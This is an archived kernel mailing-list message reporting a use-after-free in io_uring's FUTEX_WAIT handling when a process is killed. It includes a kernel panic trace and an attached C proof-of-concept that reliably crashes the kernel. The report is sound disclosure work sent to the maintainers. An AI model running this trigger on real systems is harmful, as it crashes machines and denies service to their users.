public inbox for io-uring@vger.kernel.org
 help / color / mirror / Atom feed
From: rtm@csail.mit.edu
To: Jens Axboe <axboe@kernel.dk>,
	Pavel Begunkov <asml.silence@gmail.com>,
	io-uring@vger.kernel.org
Subject: use-after-free if killed while in IORING_OP_FUTEX_WAIT
Date: Wed, 04 Jun 2025 09:58:02 -0400	[thread overview]
Message-ID: <38053.1749045482@localhost> (raw)

[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]

If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the iouring request still exists. When (a little
later in do_exit()) the iouring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.

I've attached a demo:

# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
 ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---

Robert Morris
rtm@mit.edu


[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>

int dirfd = -1;
int pfds[2];
int sock = -1;

//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//

#define QUEUE_DEPTH 1
#define BLOCK_SZ    1024

struct app_io_sq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    unsigned *flags;
    unsigned *array;
};

struct app_io_cq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    struct io_uring_cqe *cqes;
};

struct submitter {
    int ring_fd;
    struct app_io_sq_ring sq_ring;
    struct io_uring_sqe *sqes;
    struct app_io_cq_ring cq_ring;
};

struct file_info {
    off_t file_sz;
    struct iovec iovecs[];      /* Referred by readv/writev */
};

int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    return (int) syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_enter(int ring_fd, unsigned int to_submit,
                          unsigned int min_complete, unsigned int flags)
{
    return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
                   flags, NULL, 0);
}

int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    void *sq_ptr, *cq_ptr;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE, 
            MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE, 
                MAP_SHARED | MAP_POPULATE,
                s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_ptr == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
    }

    sring->head = sq_ptr + p.sq_off.head;
    sring->tail = sq_ptr + p.sq_off.tail;
    sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
    sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
    sring->flags = sq_ptr + p.sq_off.flags;
    sring->array = sq_ptr + p.sq_off.array;

    s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
            PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQES);
    if (s->sqes == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    cring->head = cq_ptr + p.cq_off.head;
    cring->tail = cq_ptr + p.cq_off.tail;
    cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
    cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
    cring->cqes = cq_ptr + p.cq_off.cqes;

    return 0;
}

int submit_to_sq(char *file_path, struct submitter *s) {
    struct file_info *fi;

    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0 ) {
        perror("open");
        return 1;
    }

    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;

    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ) blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        return 1;
    }
    fi->file_sz = file_sz;

    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;

        fi->iovecs[current_block].iov_len = bytes_to_read;

        void *buf;
        if( posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
            perror("posix_memalign");
            return 1;
        }
        fi->iovecs[current_block].iov_base = buf;

        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    next_tail = tail = *sring->tail;
    next_tail++;
    index = tail & *s->sq_ring.ring_mask;
    struct io_uring_sqe *sqe = &s->sqes[index];
    sqe->flags = 0;
    sqe->off = 0;
    sring->array[index] = index;
    tail = next_tail;

    sqe->len = 0;
    sqe->optval = 0x80000000;

    static char buf[32];
    memset(buf, 0xff, sizeof(buf));
    *(long*)buf = 0xffffffff00000000;
    sqe->addr = (__u64) buf;

    sqe->opcode = IORING_OP_FUTEX_WAIT;
    sqe->flags = 2;
    sqe->fd = 130;

    if(*sring->tail != tail) {
        *sring->tail = tail;
    }

    int ret =  io_uring_enter(s->ring_fd, 1,1,
            IORING_ENTER_GETEVENTS);
    if(ret < 0) {
        perror("io_uring_enter");
        return 1;
    }

    return 0;
}

int
main()
{
  struct rlimit r;   
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  unlink("z");
  system("echo hi > z");

  int pid = fork();
  if(pid == 0){
    struct submitter *s;

    dirfd = open(".", 0);

    socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
    write(pfds[0], "a", 1);
    write(pfds[1], "b", 1);

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    
    s = malloc(sizeof(*s));
    if (!s) {
      perror("malloc");
      exit(0);
    }
    memset(s, 0, sizeof(*s));
    
    if(app_setup_uring(s)) {
      fprintf(stderr, "Unable to setup uring!\n");
      exit(0);
    }
    
    if(submit_to_sq("z", s)) {
      fprintf(stderr, "Error reading file z\n");
      exit(0);
    }

    printf("child exiting\n");
    exit(0);
  }

  sleep(1);
  printf("killing child\n");
  kill(pid, 9);
  usleep(200000);
}

             reply	other threads:[~2025-06-04 14:10 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-06-04 13:58 rtm [this message]
2025-06-04 14:12 ` use-after-free if killed while in IORING_OP_FUTEX_WAIT Jens Axboe
2025-06-04 16:22   ` Jens Axboe

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=38053.1749045482@localhost \
    --to=rtm@csail.mit.edu \
    --cc=asml.silence@gmail.com \
    --cc=axboe@kernel.dk \
    --cc=io-uring@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox